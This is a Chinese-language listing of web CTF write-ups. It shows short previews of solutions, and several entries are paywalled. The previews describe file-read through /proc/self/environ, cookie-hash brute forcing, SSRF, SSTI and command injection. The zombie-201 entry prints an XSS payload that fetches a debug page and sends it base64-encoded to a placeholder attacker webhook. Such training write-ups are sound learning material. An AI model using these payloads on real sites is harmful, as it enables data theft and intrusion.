-
pay-to-win
下载压缩包,查看源码1.这个地方通过theme参数,可以任意文件读取,前提是user_type==premium2.这个地方大概是说cookie里的两个参数是怎么来的,b64data是data进行base64编码后,hash是b64data+随机数,python可以多次试一下hex(random.getrandbits(24))[2:],结果是6位a-f0-9的随机值,爆破就可以得到了3.打开靶机...
- WEB
- 23天前
-
Curl as a Service[n00bzCTF-2022]
这道题需要我们注入curl命令之后的部分输入一些正常语法访问外部网站都为500错误尝试使用file伪协议可以查看到本机的信息查看当前进程变量:file:///proc/self/environ得到信息与flagPATH:/usr/local/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/binHOSTNAME:0ae839...
- WEB
- 24天前
-
Resume[Welcome Ctf-2021]
对于这一题,题目说明就讲这是一个ssrf造成任意文件读取那我们就进入题目看一下进入后显示是一个表单,需要我们填写信息(这里顺便测试了xss,你自己也可以试一试,是完全OK的),随便填充后网页转到/create.php除了download外都是静态资源,我们点击download进行查看要注意这里不是直接下载,而是给用户一个编辑机会,点击右上角文档属性看到pdf编辑应用为wkhtmltopdf0.12...
- WEB
- 24天前
-
【Web-源代码】分析逻辑
看到题目描述“看看源代码?”,我们F12查看源代码:看到script里有混淆后的东西,p1和p2变量经过一些操作之后被eval(执行),根据经验,我们知道形如“%xx”(xx为16进制)的大概率为url编码,且eval里的“unescape”也代表这是url编码。进行解码和eval里对应的拼接操作后,我们得到形如以下的实际代码:functioncheckSubmit(){vara=document...
- WEB
- 28天前
-
Personal_IP_Query-
***收费WriteUP请购买后查看,VIP用户可免费查看***
-
1 金币
- WEB
- 1月前
-
TAMUctf2019 Science——ssti模板注入
***收费WriteUP请购买后查看,VIP用户可免费查看***
-
1 金币
- WEB
- 1月前
-
zombie-201
进入题目是这个界面从第一个框传入payload,然后从第二个框中访问,具体如下:1.首先构造payloadfetch('{你的题目地址}/debug').then((response)=>response.text()).then(data=>fetch('{你的webhook地址}?data='+btoa(data)))由于http_only设置为了true,因此不能通过docume...
- WEB
- 1月前
-
SQL注入.2
***收费WriteUP请购买后查看,VIP用户可免费查看***
-
1 金币
- WEB
- 1月前
-
签到题[NCTF - 2018] [WEB]
直接浏览器请求/index.php会自动执行/search/src=https%3A%2F%2Fpic.rmb.bdstatic.com%2Fbjh%2Fuser%2F0b75af50fffda1eaef389f0ef49d1e37.jpeg&refer=http%3A%2F%2Fwww.baidu.com&app=2021&size=r1,1&n=0&g=...
- WEB
- 1月前
-
签到题[miniLCTF-2020] [WEB]
看到首页中system知道a为传入的命令尝试ls/可以得到/下目录尝试执行/readflag显示一个字符串尝试使用cat等读取readflag看是不是正常文件显示乱码,搜索flag没信息,打开源代码查看并搜索flag显示如上一个表达式%d+%d=%d,可能这个readflag是一个交互式二进制文件我们尝试构造语句模拟输入echo-e生成交互式输入表示两个数字结果为100管道|将这些输入传递给/re...
- WEB
- 1月前
-
inspector Challenge Details A baby web challenge
***收费WriteUP请购买后查看,VIP用户可免费查看***
-
1 金币
- WEB
- 1月前
-
HECTF-baby_sql
***收费WriteUP请购买后查看,VIP用户可免费查看***
-
1 金币
- WEB
- 2月前
-
source
***收费WriteUP请购买后查看,VIP用户可免费查看***
-
2 金币
- WEB
- 2月前
-
attack-strategies
***收费WriteUP请购买后查看,VIP用户可免费查看***
-
1 金币
- WEB
- 2月前
-
GoldenHornKing
打开网页给出了源代码首先肯定是格式化一下这里是个超时函数(不重要)第一行创建FastAPI应用实例第二行控制对Jinja2模板渲染的访问后面将当前路径的目录作为Jinja2模板的目录第一个"/"路由没什么好说的首先是检查calc_req是否包含数字、百分号、非ASCII字符或者access是否已经被设置为True如果安全检查通过这行代码将使用Jinja2模板引擎渲染calc_req参数jinja2...
- WEB
- 3月前
-
NCTF-2018 签到题
打开网站是百度看到下面的cookie有信息,抓包在请求包中添加cookie,并修改url
- WEB
- 3月前
-
image compressor
***收费WriteUP请购买后查看,VIP用户可免费查看***
-
2 金币
- WEB
- 3月前
-
view source的Writeup
***收费WriteUP请购买后查看,VIP用户可免费查看***
-
1 金币
- WEB
- 3月前
-
admin_Test
***收费WriteUP请购买后查看,VIP用户可免费查看***
-
2 金币
- WEB
- 4月前
-
Upload_it_2 解题
***收费WriteUP请购买后查看,VIP用户可免费查看***
-
1 金币
- WEB
- 4月前